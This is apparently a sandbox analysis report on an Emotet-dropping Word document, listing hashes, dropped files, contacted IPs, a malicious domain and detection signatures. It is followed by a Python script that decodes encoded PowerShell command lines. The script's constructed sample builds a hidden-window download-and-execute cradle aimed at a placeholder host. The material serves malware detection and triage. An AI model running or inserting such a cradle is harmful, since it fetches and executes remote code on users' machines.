Sandbox version: 31.0.0 Emerald
IR
Analysis ID: 344615
CloudBasic
Start time: 19:54:57
Start date: 26/01/2021
Sample file name: PO# 01222021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Platform: WINDOWS
Sample MD5: 556b98b4cdae000de8f496d6d896743c
Sample SHA1: b7ca4118eab252bc4758fa18265b04a2afbbf9c2
Sample SHA256: dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a
File type: Microsoft Word document (32009/1) 79.99%
true
false
false
false
100
0
100
5
0
5
false
Dropped files:

File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp
  Malicious: false
  MD5: 5D4D94EE7E06BBB0AF9584119797B23A
  SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
  SHA256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1

File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D276006A-4137-4F1B-A238-F5A3AEDA2F09}.tmp
  Malicious: false
  MD5: 077391DECA1A52BFEF17769EC216C04F
  SHA1: 37988417BC337B1835851A5C80AB570598288618
  SHA256: E8DB47CBB5176C6395AE34E4CF158381EBF0E5A337E870EB206BBB17E7D6FB8B

File: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO# 01222021.LNK
  Malicious: false
  MD5: 6EB10DB054A2FC20329E9A24A1F74C5A
  SHA1: FCC1666D8F3F5F4C31E37E823BEDD6046FC0C3E6
  SHA256: 33DA77C164AD6408A014B140971748E2E0AF6EDCBE16E3E84CA175041E8D1414

File: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Malicious: false
  MD5: 61D243ECFBDB337B6222DCEDA0836970
  SHA1: A345D638AFD23701681AC8EAB13A1CFFBFE7A670
  SHA256: F4BD2CCCA06B35839418ABCFB364DF38BA94C3A3143F78653E01CBA58220397F

File: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Malicious: false
  MD5: 6AF5EAEBE6C935D9A5422D99EEE6BEF0
  SHA1: 6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
  SHA256: CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719

File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEA56CXGKG1P2T41MR9D.temp
  Malicious: false
  MD5: C7E7B4D84BB21E802060729A72785E31
  SHA1: 471EBC4B37281BA67F179E127DA129B5AA0ED9ED
  SHA256: 4503E94124DD30A6A2003C278AAD5081AE991C6BC17B1957B74C2778F37A5850

File: C:\Users\user\Desktop\~$# 01222021.doc
  Malicious: false
  MD5: 6AF5EAEBE6C935D9A5422D99EEE6BEF0
  SHA1: 6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
  SHA256: CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719

File: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
  Malicious: true
  MD5: 91C20850D113197A19A60B25AA08699D
  SHA1: E4D444F34C5E5DF4FACBDD674A523386B3F6383B
  SHA256: A4AD0AEC4018E7C9A63324A417792D798E62C4686A2235615FC2B7339CA87F39
Contacted IPs:
  195.159.28.230
  69.38.130.14
  103.143.46.51

Contacted domain: cab.mykfn.com
  Malicious: true
  Resolved IP: 103.143.46.51
Signatures:
  Creates processes via WMI
  Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
  Document contains an embedded VBA with many randomly named variables
  Document contains an embedded VBA with many string operations indicating source code obfuscation
  Encrypted powershell cmdline option found
  Hides that the sample has been downloaded from the Internet (zone.identifier)
  Machine Learning detection for dropped file
  Obfuscated command line found
  Potential dropper URLs found in powershell memory
  Powershell drops PE file
  Sigma detected: Suspicious Call by Ordinal
  Sigma detected: Suspicious Encoded PowerShell Command Line
  Suspicious powershell command line found
  Very long command line found
  Antivirus detection for URL or domain
  Multi AV Scanner detection for domain / URL
  Multi AV Scanner detection for dropped file
  Multi AV Scanner detection for submitted file
  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  System process connects to network (likely due to code injection or exploit)
  Yara detected Emotet
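Several of the signatures above ("Encrypted powershell cmdline option found", "Sigma detected: Suspicious Encoded PowerShell Command Line", "Very long command line found", "Potential dropper URLs found in powershell memory") describe the same maldoc-to-PowerShell stage: the macro launches powershell.exe with a base64 (UTF-16LE) -EncodedCommand payload carrying a download cradle. The script below is an added example of the detection logic behind those signatures; it is not code from the sandbox report or its vendor. It decodes the payload the way powershell.exe does (any prefix of -EncodedCommand of at least "-e", plus the alias "-ec"), extracts URLs from the decoded script, and flags hidden-window and download-cradle patterns. The sample command line and the URL example.invalid are constructed, and the 1000-character "very long" threshold is an assumption, since the report does not state the sandbox's value.

```python
"""Decode and triage encoded PowerShell command lines (added example)."""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of a switch, so -e, -en, -enc
# and -encodedcommand all mean -EncodedCommand; -ec is a documented alias.
ENCODED_SWITCH = "-encodedcommand"
WINDOWSTYLE_SWITCH = "-windowstyle"      # "-w hidden" is the usual short form
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
    r"invoke-expression|iex)\b", re.IGNORECASE)
# Assumption: the report does not give the sandbox's threshold; 1000 is a guess.
LONG_CMDLINE_THRESHOLD = 1000


def _is_switch(token, full_name):
    """True if token is a prefix (at least two chars, e.g. '-e') of full_name."""
    t = token.lower()
    return len(t) >= 2 and full_name.startswith(t)


def decode_encoded_command(b64):
    """Decode an -EncodedCommand payload: base64 of UTF-16LE script text.
    Returns None for malformed input (odd byte count, bad base64) instead of raising."""
    try:
        raw = base64.b64decode(b64.strip("'\""), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_powershell_cmdline(cmdline):
    """Return {'encoded', 'decoded', 'urls', 'flags'} for one command line."""
    tokens = cmdline.split()
    result = {"encoded": False, "decoded": None, "urls": [], "flags": []}
    for i, tok in enumerate(tokens):
        has_arg = i + 1 < len(tokens)
        if has_arg and (_is_switch(tok, ENCODED_SWITCH) or tok.lower() == "-ec"):
            result["encoded"] = True
            result["decoded"] = decode_encoded_command(tokens[i + 1])
        if has_arg and _is_switch(tok, WINDOWSTYLE_SWITCH) \
                and tokens[i + 1].lower() == "hidden":
            result["flags"].append("hidden_window")
    if result["encoded"]:
        result["flags"].append("encoded_command")
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        result["flags"].append("very_long_command_line")
    # Inspect the decoded script when we have one, otherwise the raw command line.
    script = result["decoded"] if result["decoded"] is not None else cmdline
    if CRADLE_RE.search(script):
        result["flags"].append("download_cradle")
    result["urls"] = URL_RE.findall(script)
    return result


def build_sample_cmdline():
    """Constructed sample, not taken from the report: a hidden-window download
    cradle encoded the way a macro dropper typically launches it."""
    script = ("IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/payload.bin')")
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -nop -w hidden -enc " + encoded


if __name__ == "__main__":
    for line in (build_sample_cmdline(),
                 "powershell.exe -ExecutionPolicy Bypass -File setup.ps1"):
        r = analyze_powershell_cmdline(line)
        print(r["flags"], r["urls"], (r["decoded"] or "")[:60])
```

Note that -ExecutionPolicy does not trigger the encoded check, because "-executionpolicy" is not a prefix of "-encodedcommand"; matching on a bare "-e" substring, as some ad hoc rules do, would produce that false positive. A payload that fails to decode is still reported as encoded, which is the right call for triage: a malformed or split payload is more suspicious, not less.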